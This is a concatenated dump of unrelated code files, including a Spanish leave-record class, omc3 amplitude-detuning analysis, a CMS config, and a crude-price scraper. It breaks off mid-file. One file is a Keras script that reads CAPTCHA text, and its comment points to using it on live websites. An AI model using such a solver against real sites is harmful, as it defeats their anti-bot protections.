1\n\t\t\t\n\t\n\t@property\n\tdef hasta(self):\n\t\treturn self._hasta\n\t\n\t@hasta.setter\n\tdef hasta(self, hasta):\n\t\t\n\t\thasta = str(hasta)\n\t\t\n\t\tdia = \"\"\n\t\tmes = \"\"\n\t\tanio = \"\"\n\t\t\n\t\tif \"/\" in hasta:\n\t\t\tdia, mes, anio = hasta.split('/')\n\t\telif \"-\" in hasta:\n\t\t\tanio, mes, dia = hasta.split('-')\n\t\telse:\n\t\t\traise Exception(\"La fecha hasta posee un formato no válido.\")\n\t\t\n\t\tdia = int(dia)\n\t\tmes = int(mes)\n\t\tanio = int(anio)\n\t\t\n\t\ttry:\n\t\t\tdatetime(anio, mes, dia)\n\t\texcept ValueError:\n\t\t\traise Exception(\"La fecha hasta no es válida.\")\n\t\t\n\t\tdia = str(dia)\n\t\tmes = str(mes)\n\t\tanio = str(anio)\n\t\t\n\t\tif self._hasta != dia + \"/\" + mes + \"/\" + anio:\n\t\t\tself._hasta = dia + \"/\" + mes + \"/\" + anio\n\t\t\tself._cambios = True\n\t\t\n\t\tif self._desde != \"\":\n\t\t\t\n\t\t\tddia, dmes, danio = str(self._desde).split('/')\n\t\t\thdia, hmes, hanio = str(self._hasta).split('/')\n\t\t\t\n\t\t\tcomp_desde = datetime(int(danio), int(dmes), int(ddia))\n\t\t\tcomp_hasta = datetime(int(hanio), int(hmes), int(hdia))\n\t\t\t\n\t\t\tif ((comp_hasta - comp_desde).days + 1) < 1:\n\t\t\t\tself._desde = \"\"\n\t\t\t\treturn\n\t\t\t\n\t\t\tself.dias_tomados = (comp_hasta - comp_desde).days + 1\n\t\n\t@property\n\tdef dias_tomados(self):\n\t\treturn self._dias_tomados\n\t\n\t@dias_tomados.setter\n\tdef dias_tomados(self, dias_tomados):\n\t\t\n\t\ttry:\n\t\t\tdias_tomados = int(dias_tomados)\n\t\t\t\n\t\t\tif dias_tomados < 1:\n\t\t\t\traise ValueError\n\t\t\t\n\t\texcept ValueError:\n\t\t\traise Exception(\"La cantidad de días no es válida.\")\n\t\t\n\t\tif self._dias_tomados != dias_tomados:\n\t\t\tself._dias_tomados = dias_tomados\n\t\t\tself._cambios = True\n\t\n\t@property\n\tdef tipo(self):\n\t\treturn self._tipo\n\t\n\t@tipo.setter\n\tdef tipo(self, tipo):\n\t\t\n\t\tif tipo is None or (isinstance(tipo, str) and tipo == \"\"):\n\t\t\traise Exception(\"El tipo de licencia es un campo requerido.\")\n\t\t\n\t\ttipo = tipo.capitalize()\n\t\t\n\t\ttipos = ['18',\\\n\t\t\t\t\t'3',\\\n\t\t\t\t\t'53',\\\n\t\t\t\t\t'58',\\\n\t\t\t\t\t'Comisión',\\\n\t\t\t\t\t'Enfermedad',\\\n\t\t\t\t\t'Franco',\\\n\t\t\t\t\t'Otro']\n\t\t\n\t\tif tipo not in tipos:\n\t\t\traise Exception(\"El tipo de licencia no es válido.\")\n\t\t\n\t\tif self._tipo != tipo:\n\t\t\tself._tipo = tipo\n\t\t\tself._cambios = True\n\t\n\t@property\n\tdef comentario(self):\n\t\treturn self._comentario\n\t\n\t@comentario.setter\n\tdef comentario(self, comentario):\n\t\t\n\t\tif comentario is None:\n\t\t\treturn\n\t\t\n\t\tif self._comentario == comentario:\n\t\t\treturn\n\t\t\n\t\tcomentario.replace(';', ',')\n\t\t\n\t\tself._comentario = comentario\n\t\tself._cambios = True\n\t\n\t\"\"\"Fin: Getters y Setters\"\"\"\n","sub_path":"m/licencia.py","file_name":"licencia.py","file_ext":"py","file_size_in_byte":11665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"630908813","text":"from keras.models import load_model\nfrom imutils import paths\nimport numpy as np\nimport imutils\nfrom cv2 import cv2\nimport pickle\nfrom extractChar import pad_image\nimport os\n\n\n\nMODEL_FILENAME = \"captcha_model.hdf5\"\nMODEL_LABELS_FILENAME = \"model_labels.dat\"\nCAPTCHA_IMAGE_FOLDER = \"test1\"\n\n\n# Load up the model labels (so we can translate model predictions to actual letters)\nwith open(MODEL_LABELS_FILENAME, \"rb\") as f:\n lb = pickle.load(f)\n\n# Load the trained neural network\nmodel = load_model(MODEL_FILENAME)\n\n# Grab some random CAPTCHA images to test against.\n# In the real world, you'd replace this section with code to grab a real\n# CAPTCHA image from a live website.\ncaptcha_image_files = list(paths.list_images(CAPTCHA_IMAGE_FOLDER))\n# captcha_image_files = np.random.choice(\n# captcha_image_files, size=(3,), replace=False)\n\n# loop over the image paths\nfor image_file in captcha_image_files:\n # Load the image and convert it to grayscale\n print(image_file)\n image = cv2.imread(image_file)\n # image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n image = cv2.imread(image_file)\n\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n low = np.array([0, 100, 250])\n high = np.array([179, 255, 255])\n mask_fore = cv2.inRange(hsv, low, high)\n mask_back = cv2.bitwise_not(mask_fore)\n\n kernel = np.ones((11, 11), np.float32)/121\n fltr1_f_dil = cv2.dilate(mask_fore, kernel, iterations=1)\n fltr1_f_bor = cv2.bitwise_and(mask_back, mask_back, mask=fltr1_f_dil)\n\n contours, hierarchy = cv2.findContours(\n fltr1_f_bor, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contours = sorted(contours, key=lambda ctr: cv2.boundingRect(ctr)[0])\n\n # save_path = os.path.join(os.getcwd(), OUTPUT_FOLDER)\n # if not os.path.exists(save_path):\n # os.makedirs(save_path)\n # for cnt, letter in zip(contours, captcha_correct_text):\n # save_path = os.path.join(OUTPUT_FOLDER, letter)\n # if not os.path.exists(save_path):\n # os.makedirs(save_path)\n # x, y, w, h = cv2.boundingRect(cnt)\n # if w > 50 and h > 50:\n # count = counts.get(letter, 1)\n # p = os.path.join(save_path, \"{}.png\".format(str(count).zfill(6)))\n # cv2.imwrite(p, pad_image(fltr1_f_bor[y:y+h, x:x+w]))\n # counts[letter] = count + 1\n # letter_image_regions = []\n\n predictions = []\n\n # loop over the lektters\n count = 0\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n im = pad_image(fltr1_f_bor[y:y+h, x:x+w])\n thresh = 127\n im = cv2.threshold(im, thresh, 255, cv2.THRESH_BINARY)[1]\n im = np.expand_dims(im, axis=2)\n im = np.expand_dims(im, axis=0)\n prediction = model.predict(im)\n\n # Convert the one-hot-encoded prediction back to a normal letter\n letter = lb.inverse_transform(prediction)[0]\n predictions.append(letter)\n captcha_text = \"\".join(predictions)\n print(\"CAPTCHA text is: {}\".format(captcha_text))\n\n # Show the annotated image\n # cv2.imshow(\"Output\", output)\n # cv2.waitKey()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"502817553","text":"\"\"\"\nAmplitude Detuning Analysis\n---------------------------\n\nEntrypoint for amplitude detuning analysis.\n\nThis module provides functionality to run amplitude detuning analysis with additionally getting\nBBQ data from timber, averaging and filtering this data and subtracting it from the measurement\ndata.\n\nFurthermore, the orthogonal distance regression is utilized to get a linear or quadratic fit from\nthe measurements.\n\n\n**Arguments:**\n\n*--Required--*\n\n- **beam** *(int)*:\n\n Which beam to use.\n\n\n- **kick** *(PathOrStr)*:\n\n Location of the kick files (parent folder).\n\n\n- **plane** *(str)*:\n\n Plane of the kicks. 'X' or 'Y' or 'XY'.\n\n choices: ``['X', 'Y', 'XY']``\n\n\n*--Optional--*\n\n- **bbq_filtering_method** *(str)*:\n\n Filtering method for the bbq to use. 'cut' cuts around a given tune,\n 'minmax' lets you specify the limits and 'outliers' uses the outlier\n filtering from utils.\n\n choices: ``['cut', 'minmax', 'outliers']``\n\n default: ``outliers``\n\n\n- **bbq_in** *(UnionPathStrInt)*:\n\n Fill number of desired data to extract from timber or path to presaved\n bbq-tfs-file. Use the string 'kick' to use the timestamps in the\n kickfile for timber extraction. Not giving this parameter skips bbq\n compensation.\n\n\n- **detuning_order** *(int)*:\n\n Order of the detuning as int. Basically just the order of the applied\n fit.\n\n default: ``1``\n\n\n- **fine_cut** *(float)*:\n\n Cut, i.e. tolerance, of the tune (fine cleaning for 'minmax' or\n 'cut').\n\n\n- **fine_window** *(int)*:\n\n Length of the moving average window, i.e the number of data points\n (fine cleaning for 'minmax' or 'cut').\n\n\n- **label** *(str)*:\n\n Label to identify this run.\n\n\n- **outlier_limit** *(float)*:\n\n Limit, i.e. cut, on outliers (Method 'outliers')\n\n default: ``0.0002``\n\n\n- **output** *(PathOrStr)*:\n\n Output directory for the modified kickfile and bbq data.\n\n\n- **tune_cut** *(float)*:\n\n Cuts for the tune. For BBQ cleaning (Method 'cut').\n\n\n- **tunes** *(float)*:\n\n Tunes for BBQ cleaning (Method 'cut').\n\n\n- **tunes_minmax** *(float)*:\n\n Tunes minima and maxima in the order x_min, x_max, y_min, y_max. For\n BBQ cleaning (Method 'minmax').\n\n\n- **window_length** *(int)*:\n\n Length of the moving average window. (# data points)\n\n default: ``20``\n\n\n\"\"\"\nfrom datetime import timedelta\nfrom pathlib import Path\nfrom typing import List, Sequence, Tuple, Dict, Any, Union\n\nimport numpy as np\nimport tfs\nfrom generic_parser import DotDict\nfrom generic_parser.entrypoint_parser import EntryPointParameters, entrypoint\nfrom numpy.typing import ArrayLike\nfrom tfs.frame import TfsDataFrame\n\nfrom omc3.definitions.constants import PLANES\nfrom omc3.tune_analysis import fitting_tools, kick_file_modifiers, timber_extract\nfrom omc3.tune_analysis.bbq_tools import OutlierFilterOpt, MinMaxFilterOpt, FilterOpts\nfrom omc3.tune_analysis.constants import (\n get_bbq_col,\n get_bbq_out_name,\n get_kick_out_name,\n get_timber_bbq_key,\n get_natq_err_col,\n INPUT_KICK, INPUT_PREVIOUS, CORRECTED,\n)\nfrom omc3.tune_analysis.kick_file_modifiers import (\n read_timed_dataframe,\n read_two_kick_files_from_folder,\n write_timed_dataframe, AmpDetData,\n)\nfrom omc3.utils.iotools import PathOrStr, UnionPathStrInt, save_config\nfrom omc3.utils.logging_tools import get_logger, list2str\nfrom omc3.utils.time_tools import CERNDatetime\n\n# Globals ----------------------------------------------------------------------\n\nDTIME: int = 120 # extra seconds to add to kick times window when extracting from timber\n\nLOG = get_logger(__name__)\n\nFILTER_OPTS = dict(\n cut=(\"window_length\", \"tunes\", \"tune_cut\"), # \"fine_window\", \"fine_cut\"\n minmax=(\"window_length\", \"tunes_minmax\", ), # \"fine_window\", \"fine_cut\"\n outliers=(\"window_length\", \"outlier_limit\"),\n)\n\n\n# Get Parameters ---------------------------------------------------------------\n\n\ndef _get_params():\n return EntryPointParameters(\n beam=dict(\n help=\"Which beam to use.\",\n required=True,\n type=int,\n ),\n kick=dict(\n help=\"Location of the kick files (parent folder).\",\n type=PathOrStr,\n required=True,\n ),\n plane=dict(\n help=\"Plane of the kicks. 'X' or 'Y' or 'XY'.\",\n required=True,\n choices=list(PLANES) + [\"\".join(PLANES)],\n type=str,\n ),\n label=dict(\n help=\"Label to identify this run.\",\n type=str,\n ),\n bbq_in=dict(\n help=\"Fill number of desired data to extract from timber or path to presaved bbq-tfs-file. \"\n f\"Use the string '{INPUT_KICK}' to use the timestamps in the kickfile for timber extraction. \"\n f\"Use the string '{INPUT_PREVIOUS}' to look for the modified ampdet kick-file from a previous run. \"\n \"Not giving this parameter skips bbq compensation.\",\n type=UnionPathStrInt\n ),\n detuning_order=dict(\n help=\"Order of the detuning as int. Basically just the order of the applied fit.\",\n type=int,\n default=1,\n ),\n output=dict(\n help=\"Output directory for the modified kickfile and bbq data.\",\n type=PathOrStr,\n ),\n window_length=dict(\n help=\"Length of the moving average window. (# data points)\",\n type=int,\n default=20,\n ),\n bbq_filtering_method=dict(\n help=\"Filtering method for the bbq to use. 'cut' cuts around a given tune, 'minmax' lets you \"\n \"specify the limits and 'outliers' uses the outlier filtering from utils.\",\n type=str,\n choices=list(FILTER_OPTS.keys()),\n default=\"outliers\",\n ),\n # Filtering method outliers\n outlier_limit=dict(\n help=\"Limit, i.e. cut, on outliers (Method 'outliers')\",\n type=float,\n default=2e-4,\n ),\n # Filtering method tune-cut\n tunes=dict(\n help=\"Tunes for BBQ cleaning (Method 'cut').\",\n type=float,\n nargs=2,\n ),\n tune_cut=dict(\n help=\"Cuts for the tune. For BBQ cleaning (Method 'cut').\",\n type=float,\n ),\n # Filtering method tune-minmax\n tunes_minmax=dict(\n help=\"Tunes minima and maxima in the order x_min, x_max, y_min, y_max. \"\n \"For BBQ cleaning (Method 'minmax').\",\n type=float,\n nargs=4,\n ),\n # Fine Cleaning\n fine_window=dict(\n help=\"Length of the moving average window, i.e the number of data points \"\n \"(fine cleaning for 'minmax' or 'cut').\",\n type=int,\n ),\n fine_cut=dict(\n help=\"Cut, i.e. tolerance, of the tune (fine cleaning for 'minmax' or 'cut').\",\n type=float,\n ),\n )\n\n\n# Main -------------------------------------------------------------------------\n\n\n@entrypoint(_get_params(), strict=True)\ndef analyse_with_bbq_corrections(opt: DotDict) -> Tuple[TfsDataFrame, TfsDataFrame]:\n \"\"\"\n Create amplitude detuning analysis with BBQ correction from timber data.\n\n Returns:\n The amplitude detuning analysis results as a TfsDataFrame and the BBQ data as a TfsDataFrame.\n \"\"\"\n LOG.info(\"Starting Amplitude Detuning Analysis\")\n _save_options(opt)\n\n opt, filter_opt = _check_analyse_opt(opt)\n kick_df, bbq_df = get_kick_and_bbq_df(kick=opt.kick, bbq_in=opt.bbq_in,\n beam=opt.beam,\n filter_opt=filter_opt)\n\n kick_plane = opt.plane\n\n for corrected in [False] + _should_do_corrected(kick_df, opt.bbq_in):\n if kick_plane in PLANES:\n kick_df = single_action_analysis(kick_df, kick_plane, opt.detuning_order, corrected)\n else:\n kick_df = double_action_analysis(kick_df, opt.detuning_order, corrected)\n\n if opt.output:\n _write_dataframes(opt.output, kick_df, bbq_df)\n return kick_df, bbq_df\n\n\ndef get_kick_and_bbq_df(kick: Union[Path, str], bbq_in: Union[Path, str],\n beam: int = None,\n filter_opt: FilterOpts = None,\n ) -> Tuple[tfs.TfsDataFrame, tfs.TfsDataFrame]:\n \"\"\"Load the input data.\"\"\"\n bbq_df = None\n if bbq_in is not None and bbq_in == INPUT_PREVIOUS:\n # NOTE: this is not the same as the \"previous BBQ data\" option in the GUI.\n # That one just uses the previous bbq_ampdet.tfs file (loaded in the \"else\" below).\n # The use-case for the INPUT_PREVIOUS option here is,\n # that you can modify the kick_ampdet_xy file manually (e.g. removing kicks)\n # and run the fitting on the new data again,\n # without having to touch the whole BBQ stuff again (as the values are already in the file).\n # Tips:\n # - Remove full columns to get rid of the whole kick\n # - Add NaNs into NATQ columns you want to ignore (in case you want to keep the other plane for this kick)\n # - Add NaNs to the ERRNATQ columns if you want to plot the point (w/o error bars) but not use it for fit\n LOG.debug(\"Getting data from previous ampdet kick file\")\n kick_df = read_timed_dataframe(Path(kick) / get_kick_out_name())\n kick_df.headers = {k: v for k, v in kick_df.headers.items() if not k.startswith(\"ODR_\")}\n\n # redo the corrected columns, so you only need to add NaNs into the NATQ columns\n LOG.debug(\"Adding corrected natural tunes and stdev to kick data\")\n kick_df = kick_file_modifiers.add_corrected_natural_tunes(kick_df)\n else:\n LOG.debug(\"Getting data from kick files\")\n kick_df = read_two_kick_files_from_folder(kick)\n\n if bbq_in is not None:\n bbq_df = _get_bbq_data(beam, bbq_in, kick_df)\n\n LOG.debug(\"Adding moving average data to kick data\")\n kick_df, bbq_df = kick_file_modifiers.add_moving_average(kick_df, bbq_df, filter_opt)\n\n LOG.debug(\"Adding corrected natural tunes and stdev to kick data\")\n kick_df = kick_file_modifiers.add_corrected_natural_tunes(kick_df)\n\n return kick_df, bbq_df\n\n\ndef single_action_analysis(kick_df: tfs.TfsDataFrame, kick_plane: str, detuning_order: int = 1, corrected: bool = False\n ) -> tfs.TfsDataFrame:\n \"\"\"Performs the fit one action and tune pane at a time.\"\"\"\n LOG.info(f\"Performing amplitude detuning ODR for single-plane kicks in {kick_plane}.\")\n for tune_plane in PLANES:\n LOG.debug(\"Getting ampdet data\")\n data = kick_file_modifiers.get_ampdet_data(\n kickac_df=kick_df,\n action_plane=kick_plane,\n tune_plane=tune_plane,\n corrected=corrected\n )\n\n LOG.debug(\"Fitting ODR to kick data\")\n odr_fit = fitting_tools.do_odr(\n x=data.action,\n y=data.tune,\n xerr=data.action_err,\n yerr=data.tune_err,\n order=detuning_order,\n )\n\n kick_df = kick_file_modifiers.add_odr(\n kickac_df=kick_df,\n odr_fit=odr_fit,\n action_plane=kick_plane,\n tune_plane=tune_plane,\n corrected=corrected\n )\n return kick_df\n\n\ndef double_action_analysis(kick_df: tfs.TfsDataFrame, detuning_order: int = 1, corrected: bool = False\n ) -> tfs.TfsDataFrame:\n \"\"\"Performs the full 2D/4D fitting of the data.\"\"\"\n if detuning_order > 1:\n raise NotImplementedError(f\"2D Analysis for detuning order {detuning_order:d} is not implemented \"\n f\"(only first order so far).\")\n LOG.info(\"Performing amplitude detuning ODR for diagonal kicks.\")\n data = {}\n\n # get all action arrays and all tune arrays, unfolded below\n for plane in PLANES:\n LOG.debug(f\"Getting action and tune data for plane {plane}.\")\n data[plane] = kick_file_modifiers.get_ampdet_data(\n kickac_df=kick_df,\n action_plane=plane,\n tune_plane=plane,\n corrected=corrected,\n dropna=False, # so that they still have the same lengths\n )\n\n LOG.debug(\"Fitting ODR to kick data\")\n odr_fits = fitting_tools.do_2d_kicks_odr(\n x=_get_ampdet_data_as_array(data, \"action\"), # gets [2Jx, 2Jy]\n y=_get_ampdet_data_as_array(data, \"tune\"), # gets [Qx, Qy]\n xerr=_get_ampdet_data_as_array(data, \"action_err\"),\n yerr=_get_ampdet_data_as_array(data, \"tune_err\"),\n )\n\n # add the fits to the kick header\n for t_plane in PLANES:\n for k_plane in PLANES:\n kick_df = kick_file_modifiers.add_odr(\n kickac_df=kick_df,\n odr_fit=odr_fits[t_plane][k_plane],\n action_plane=k_plane,\n tune_plane=t_plane,\n corrected=corrected\n )\n return kick_df\n\n\ndef get_approx_bbq_interval(\n bbq_df: TfsDataFrame, time_array: Sequence[CERNDatetime], window: int) -> Tuple[CERNDatetime, CERNDatetime]:\n \"\"\"Get approximate start and end times for averaging, based on window length and kick interval.\"\"\"\n bbq_tmp = bbq_df.dropna()\n\n # convert to float to use math-comparisons\n ts_bbq_index = kick_file_modifiers.get_timestamp_index(bbq_tmp.index)\n ts_kick_index = kick_file_modifiers.get_timestamp_index(time_array)\n ts_start, ts_end = min(ts_kick_index), max(ts_kick_index)\n\n ts_bbq_min, ts_bbq_max = min(ts_bbq_index), max(ts_bbq_index)\n\n if not (ts_bbq_min <= ts_start <= ts_bbq_max):\n raise ValueError(\"The starting time of the kicks lies outside of the given BBQ times.\")\n\n if not (ts_bbq_min <= ts_end <= ts_bbq_max):\n raise ValueError(\"The end time of the kicks lies outside of the given BBQ times.\")\n\n i_start = max(ts_bbq_index.get_indexer([ts_start], method=\"nearest\")[0] - window, 0)\n i_end = min(ts_bbq_index.get_indexer([ts_end], method=\"nearest\")[0] + window, len(ts_bbq_index) - 1)\n\n return bbq_tmp.index[i_start], bbq_tmp.index[i_end]\n\n\n# Private Functions ------------------------------------------------------------\n\n\ndef _check_analyse_opt(opt: DotDict) -> Tuple[DotDict, FilterOpts]:\n \"\"\"Perform manual checks on opt-sturcture.\"\"\"\n LOG.debug(\"Checking Options.\")\n\n # for label\n if opt.label is None:\n opt.label = f\"Amplitude Detuning for Beam {opt.beam:d}\"\n\n filter_opt = None\n if (opt.bbq_in is not None) and (opt.bbq_in != INPUT_PREVIOUS):\n # check if cleaning is properly specified\n method = opt.bbq_filtering_method\n if method is None:\n raise ValueError(f\"Please choose a filtering method for the BBQ data from {list(FILTER_OPTS.keys())}\")\n\n missing_params = [name for name in FILTER_OPTS[method] if opt[name] is None]\n if any(missing_params):\n raise KeyError(\n f\"Missing parameters for cleaning method {method}: '{list2str(missing_params)}'\"\n )\n\n if bool(opt.fine_cut) != bool(opt.fine_window):\n raise KeyError(\n \"To activate fine cleaning, both fine cut and fine window need to be specified\"\n )\n\n if method == \"outliers\":\n filter_opt = OutlierFilterOpt(\n window=opt.window_length,\n limit=opt.outlier_limit\n )\n\n elif method == \"minmax\":\n filter_opt = [\n MinMaxFilterOpt(\n window=opt.window_length,\n min=opt.tunes_minmax[2*i],\n max=opt.tunes_minmax[2*i+1],\n fine_window=opt.fine_window,\n fine_cut=opt.fine_cut,\n )\n for i in range(2)\n ]\n else:\n filter_opt = [\n MinMaxFilterOpt(\n window=opt.window_length,\n min=opt.tunes[i] - opt.tune_cut,\n max=opt.tunes[i] + opt.tune_cut,\n fine_window=opt.fine_window,\n fine_cut=opt.fine_cut,\n )\n for i in range(2)\n ]\n\n if opt.output is not None:\n opt.output = Path(opt.output)\n\n return opt, filter_opt\n\n\ndef _get_bbq_data(beam: int, input_: Union[Path, str, int], kick_df: TfsDataFrame) -> TfsDataFrame:\n \"\"\"\n Return BBQ data from input, either file or timber fill, as a ``TfsDataFrame``.\n\n Note: the ``input_`` parameter is always parsed from the commandline as a string, but could be 'kick'\n or a kickfile name or an integer. All these options will be tried until one works.\n \"\"\"\n try:\n fill_number = int(input_)\n except (TypeError, ValueError) as e: # input_ is a file name or the string 'kick'\n if input_ == INPUT_KICK:\n LOG.debug(\"Getting timber data from kick times\")\n timber_keys, bbq_cols = _get_timber_keys_and_bbq_columns(beam)\n t_start = min(kick_df.index.to_numpy())\n t_end = max(kick_df.index.to_numpy())\n t_delta = timedelta(seconds=DTIME)\n data = timber_extract.extract_between_times(\n t_start - t_delta, t_end + t_delta, keys=timber_keys, names=dict(zip(timber_keys, bbq_cols))\n )\n else: # input_ is a file name or path\n LOG.debug(f\"Getting bbq data from file '{str(input_):s}'\")\n data = read_timed_dataframe(input_)\n if not len(data.index):\n raise ValueError(f\"No entries in {str(input_):s}.\")\n\n else: # input_ is a number, assumed to be a fill number\n LOG.debug(f\"Getting timber data from fill '{input_:d}'\")\n timber_keys, bbq_cols = _get_timber_keys_and_bbq_columns(beam)\n data = timber_extract.lhc_fill_to_tfs(\n fill_number, keys=timber_keys, names=dict(zip(timber_keys, bbq_cols))\n )\n return data\n\n\ndef _get_timber_keys_and_bbq_columns(beam: int) -> Tuple[List[str], List[str]]:\n keys = [get_timber_bbq_key(plane, beam) for plane in PLANES]\n cols = [get_bbq_col(plane) for plane in PLANES]\n return keys, cols\n\n\ndef _should_do_corrected(kick_df, bbq_in) -> List:\n if bbq_in is None:\n return []\n if bbq_in == INPUT_PREVIOUS and not any(CORRECTED in col for col in kick_df.columns):\n return []\n return [True]\n\n\ndef _save_options(opt: DotDict) -> None:\n if opt.output:\n save_config(Path(opt.output), opt, __file__)\n\n\ndef _get_ampdet_data_as_array(data: Dict[Any, AmpDetData], column: str) -> ArrayLike:\n \"\"\" Returns a matrix with number of rows as entries in data,\n each containing the values from the given column of the AmpDetData.\n e.g. [[Jx0, Jx1, Jx2, ....]\n [Jy0, Jy1, Jy2, ....]]\n \"\"\"\n return np.vstack([getattr(d, column) for d in data.values()])\n\n\ndef _write_dataframes(output: Path, kick_df: TfsDataFrame, bbq_df: TfsDataFrame):\n LOG.info(f\"Writing kick data to file in directory '{output.absolute()}'\")\n output.mkdir(parents=True, exist_ok=True)\n write_timed_dataframe(output / get_kick_out_name(), kick_df)\n if bbq_df is not None:\n LOG.info(f\"Writing BBQ data to file in directory '{output.absolute()}'\")\n write_timed_dataframe(output / get_bbq_out_name(), bbq_df)\n\n\n# Script Mode ##################################################################\n\n\nif __name__ == \"__main__\":\n analyse_with_bbq_corrections()\n","sub_path":"omc3/amplitude_detuning_analysis.py","file_name":"amplitude_detuning_analysis.py","file_ext":"py","file_size_in_byte":19479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"575228233","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"ANALYSIS\")\n#process.load('Configuration.StandardSequences.Services_cff')\n#process.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')\n\nprocess.GlobalTag.globaltag = 'MCRUN2_74_V9'\n\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(5)\n)\n\n\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n'file:/hdfs/store/mc/RunIISpring15DR74/SUSYGluGluToHToTauTau_M-160_TuneCUETP8M1_13TeV-pythia8/MINIAODSIM/Asympt25ns_MCRUN2_74_V9-v1/10000/2A3929AE-5303-E511-9EFE-0025905A48C0.root'\n\t\t),\nfirstEvent = cms.untracked.uint32(628),\n\t\tinputCommands=cms.untracked.vstring(\n\t\t\t\t\t\t'keep *',\n\t\t\t\t\t\t'keep *_l1extraParticles_*_*',\n\t\t)\n)\n\n\n#added in etau and mutau triggers\nfrom UWAnalysis.Configuration.tools.analysisToolsMiniAod import *\ndefaultReconstructionMC(process,'HLT',\n [\n\t\t\t\t\t\t'HLT_Ele22_eta2p1_WP75_Gsf_LooseIsoPFTau20_v1', #etau\n 'HLT_Ele27_eta2p1_WP75_Gsf_v1', #etau\n\t\t\t\t\t\t'HLT_IsoMu17_eta2p1_LooseIsoPFTau20_v1', #mutau\n 'HLT_IsoMu24_eta2p1_IterTrk02_v1' #mutau\n ])\n\n \n\n#EventSelection\nprocess.load(\"UWAnalysis.Configuration.HiggsTauTauSync_cff\")\n\nprocess.metCalibration.applyCalibration = cms.bool(False)\n\nprocess.eventSelectionMT = cms.Path(process.selectionSequenceMT)\nprocess.eventSelectionET = cms.Path(process.selectionSequenceET)\n\ncreateGeneratedParticles(process,\n 'genDaughters',\n [\n \"keep++ pdgId = {Z0}\",\n \"keep pdgId = {tau+}\",\n \"keep pdgId = {tau-}\",\n \"keep pdgId = {mu+}\",\n \"keep pdgId = {mu-}\",\n \"keep pdgId = 6\",\n \"keep pdgId = -6\",\n \"keep pdgId = 11\",\n \"keep pdgId = -11\",\n \"keep pdgId = 25\",\n \"keep pdgId = 35\",\n \"keep abs(pdgId) = 36\"\n ]\n)\n\n\ncreateGeneratedParticles(process,\n 'genTauCands',\n [\n \"keep pdgId = {tau+} & mother.pdgId()= 25\",#{Z0}\n \"keep pdgId = {tau-} & mother.pdgId() = 25\"\n ]\n)\n\n\nfrom UWAnalysis.Configuration.tools.ntupleToolsSync import addMuTauEventTree\naddMuTauEventTree(process,'muTauEventTree')\n\nfrom UWAnalysis.Configuration.tools.ntupleToolsSync import addEleTauEventTree\naddEleTauEventTree(process,'eleTauEventTree')\n\naddEventSummary(process,True,'MT','eventSelectionMT')\naddEventSummary(process,True,'ET','eventSelectionET')\n\n# Make the framework shut up.\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\n\n","sub_path":"CRAB/OLD/Sync/LT-MC.py","file_name":"LT-MC.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"481898122","text":"# pylint: disable=redefined-outer-name\nimport contextlib\n\nimport pytest\n\n\n@pytest.fixture(scope=\"session\")\ndef clean_context():\n with contextlib.ExitStack() as stack:\n yield stack\n\n\n@pytest.fixture(params=[True, False], scope=\"module\")\ndef enable_microbatch(request):\n pytest.enable_microbatch = request.param\n return request.param\n","sub_path":"tests/integration/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"576674650","text":"from thinkdsp import Chirp\nfrom thinkdsp import normalize,unbias,decorate\nimport numpy as np\nimport matplotlib.pyplot as plt\nPI2=2*np.pi\nclass SawtoothChirp(Chirp):\n\n def evaluate(self,ts):\n \"\"\"\n 改写evaluate函数\n ts:时间\n \"\"\"\n\n freqs = np.linspace(self.start,self.end,len(ts))\n dts = np.diff(ts,prepend=0)\n dphis =PI2*freqs*dts\n phases =np.cumsum(dphis)\n cycles = phases /PI2\n frac,_=np.modf(cycles)\n ys = normalize(unbias(frac),self.amp)\n return ys\nwave = read_wave('72475__rockwehrmann__glissup02.wav')\nwave.make_spectrogram(512).plot(high=5000)\ndecorate(xlabel='Time(s)',ylabel='Frequency(Hz)')\nplt.show()\n","sub_path":"text3-3.py","file_name":"text3-3.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"6094513","text":"#!/usr/bin/env python\nfrom email.mime.text import MIMEText\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\nfrom smtplib import SMTP\nfrom time import gmtime, strftime\nimport urllib\nimport urllib2\nimport re\nresponse = urllib2.urlopen('http://content.barchart.com/genericapi/data.phpx?q=getSnapshotChart&data=D&ticker=CL*1')\nhtml = response.read()\nitems = html.split(\"\\n\")\nimage = [s for s in items if \"image\" in s]\nimage_string = \"\".join(image)\nimage_string_clean = re.search(\"(?Phttps?://[^\\s]+)\", image_string).group(\"url\").replace(\"'\", \"\")\n\nurllib.urlretrieve(image_string_clean, \"crude_clf16_wti_latest_\" + strftime(\"%Y-%m-%d_%H_%M_%S\") + \".png\")\nurllib.urlretrieve(image_string_clean, \"crude_clf16_wti_latest.png\")\n\nmsg = MIMEMultipart()\nmsg['Subject'] = 'get_crude_price.py'\nmsg['From'] = 'from email addy'\nmsg['Reply-to'] = 'reply email addy'\nmsg['To'] = 'to email add'\n\nmsg.preamble = 'Multipart message.\\n'\n\npart = MIMEText(\"Attached is the current crude 